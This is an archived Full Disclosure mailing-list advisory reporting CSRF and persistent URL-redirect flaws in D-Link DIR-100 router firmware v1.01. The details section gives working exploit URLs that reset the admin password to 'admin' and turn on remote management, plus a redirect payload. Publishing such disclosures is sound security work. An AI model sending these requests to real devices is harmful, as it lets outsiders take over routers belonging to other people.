[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] New vulnerabilities in D-Link DIR-100
From: "MustLive" <mustlive () websecurity ! com ! ua>
Date: 2018-01-31 17:03:13
Message-ID: 00d901d39ab5$6da6c380$6600a8c0 () pc
[Download RAW message or body]
Hello list!
There are Cross-Site Request Forgery and URL Redirector Abuse
vulnerabilities in D-Link DIR-100. This is my second advisory for DIR-100.
-------------------------
Affected products:
-------------------------
Vulnerable is the next model: D-Link DIR-100, Firmware v1.01. All other
versions also must be vulnerable.
----------
Details:
----------
Cross-Site Request Forgery (WASC-09):
Change admin's password:
http://site/Tools/tools_admin.xgi?SET/sys/account/superUserName=admin&SET/sys/account/superUserPassword=admin
Turn on Remote Management:
http://site/Tools/tools_admin.xgi?SET/security/firewall/httpAllow=1&SET/security/firewall/httpRemotePort=80
CSRF attack to change admin's password and turn on Remote Management:
http://site/Tools/tools_admin.xgi?SET/sys/account/superUserName=admin&SET/sys/account/superUserP \
assword=admin&SET/security/firewall/httpAllow=1&SET/security/firewall/httpRemotePort=80
URL Redirector Abuse (WASC-38):
http://site/Tools/vs.htm?location=http://www.google.com
This is Persisted Redirector attack. After setting of an address in location
parameter it saves and later on it's possible to redirect only by visiting
of the page http://site/Tools/vs.htm.
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/8021/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic